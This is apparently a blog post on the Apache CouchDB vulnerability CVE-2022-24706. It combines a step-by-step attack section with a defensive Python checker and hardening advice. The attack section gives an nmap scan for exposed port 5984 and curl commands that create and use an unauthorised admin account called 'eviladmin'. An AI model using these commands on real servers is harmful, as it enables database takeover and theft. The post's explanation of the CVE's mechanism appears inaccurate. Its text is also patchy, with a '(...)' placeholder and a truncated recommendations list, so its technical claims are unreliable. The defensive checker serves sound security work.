Apache CouchDB is a popular NoSQL database that’s easy to set up and use. But if you’re using a version before 3.2.2 and didn’t lock it down, you could be open to a huge security risk.

In this post, we’ll break down the details of CVE-2022-24706, show how attackers exploit it, and provide simple steps to secure your CouchDB. If you run any CouchDB instance (especially on the cloud or exposed to the internet), keep reading.

Impact: Remote attackers can gain full admin privileges

CVE-2022-24706 Reference

How the Exploit Works

When you install CouchDB and don’t change any settings, it listens on all network interfaces (...) by default. Before version 3.2.2, if some extra security options weren’t set, it failed to ask for authentication—meaning any remote user could connect as an admin.

This isn’t a bug, but a dangerously insecure default setup. CouchDB documentation has always recommended:

- Putting a firewall in front of the database

But, for users who missed these steps, their databases could be wide open.

Proof of Concept: Exploiting the Default CouchDB

Below, we'll show how an attacker could connect to an unprotected CouchDB and create a new admin account.

Step 1: Scan for Database

An attacker finds open CouchDB instances by scanning for port 5984 on the internet (the default CouchDB port). Tools like nmap and Shodan can help:

```
nmap -p 5984 --open -Pn <target_ip_range>
```

Step 2: Access the CouchDB HTTP Interface

CouchDB is accessible via simple HTTP requests. Let’s use curl to check if authentication is enforced:

```
curl http://target-ip:5984/_users
```

If the output shows data, or something like `{"db_name":"_users",...}`, no authentication is enforced.

If the database isn’t secured, the attacker can create a new admin with a single HTTP request:

```
curl -X PUT http://target-ip:5984/_node/_local/_config/admins/eviladmin \
     -d '"SuperSecretPassword"'
```

This adds a new admin called `eviladmin` with the chosen password.

Now the attacker can log in as that admin:

```
curl --user eviladmin:SuperSecretPassword http://target-ip:5984/_all_dbs
```

You have full control: create databases, delete data, dump contents, or even run arbitrary code if CouchDB’s features allow.

1. Upgrade Immediately: Update to CouchDB 3.2.2 or newer.

2. Set Up Admin Credentials: On install, create a strong admin user/password.

3. Remove Unused Users: Delete old users and disable guest access.
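To confirm these steps actually took effect, here is an added read-only checker (example code written for this post, not CouchDB project code) that repeats the post's unauthenticated `curl` probes and reports whether the instance still answers without credentials. The target URL is an assumed command-line argument that defaults to `http://127.0.0.1:5984`; only the endpoints already shown above are requested.

```python
import json
import sys
import urllib.error
import urllib.request

# The unauthenticated GETs from the post; HTTP 200 on any of them means no auth is enforced.
PROBES = ("/_users", "/_all_dbs", "/_node/_local/_config/admins")


def fetch(base_url, path, timeout=5):
    """GET base_url + path with no credentials and return (status, body)."""
    try:
        with urllib.request.urlopen(base_url + path, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:      # 401/403 arrive here, not as a return
        return err.code, err.read().decode("utf-8", "replace")
    except urllib.error.URLError as err:       # refused/timeout: report as status 0
        return 0, str(err.reason)


def assess(results):
    """Map {path: (status, body)} to ("EXPOSED" | "AUTH_ENFORCED", findings)."""
    findings, open_paths = [], 0
    for path, (status, body) in results.items():
        if status == 200:
            open_paths += 1
            detail = ""
            if path.endswith("/admins"):           # config API readable anonymously
                try:
                    admins = json.loads(body)
                    detail = (" (no admin accounts defined)" if admins == {}
                              else f" ({len(admins)} admin entries, hashes readable)")
                except ValueError:
                    detail = " (non-JSON body)"
            findings.append(f"{path}: readable without credentials{detail}")
        elif status in (401, 403):
            findings.append(f"{path}: credentials required (HTTP {status})")
        else:
            findings.append(f"{path}: no usable answer (HTTP {status})")
    return ("EXPOSED" if open_paths else "AUTH_ENFORCED"), findings


def check(base_url):
    """Run every probe against one instance; base_url like http://127.0.0.1:5984."""
    return assess({p: fetch(base_url, p) for p in PROBES})


if __name__ == "__main__":
    # Assumed invocation: python couchdb_check.py http://127.0.0.1:5984
    verdict, findings = check(sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:5984")
    print(verdict)
    for line in findings:
        print(" -", line)
```

A secured instance should report `AUTH_ENFORCED` with HTTP 401 on every probe; any `EXPOSED` line means the admin and firewall steps above are not yet in place.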

> CouchDB’s official security documentation has more details.

Original References & Further Reading

- CVE Entry: CVE-2022-24706
- Apache CouchDB Advisory: https://github.com/apache/couchdb/security/advisories/GHSA-4jqg-xc45-759r
- CouchDB Security Guide: https://docs.couchdb.org/en/stable/secure.html

Summary

CVE-2022-24706 is a textbook case of “bad defaults” in software leading to big trouble. If you run an old CouchDB or never set an admin password, you’re at risk.

Act now: Upgrade, lock down your database, and add a firewall. If you wait, someone else might find your data first.

Stay safe!

*Written exclusively for you. Share and secure your database today!*

Timeline

Published on: 04/26/2022 10:15:00 UTC
Last modified on: 07/13/2022 18:15:00 UTC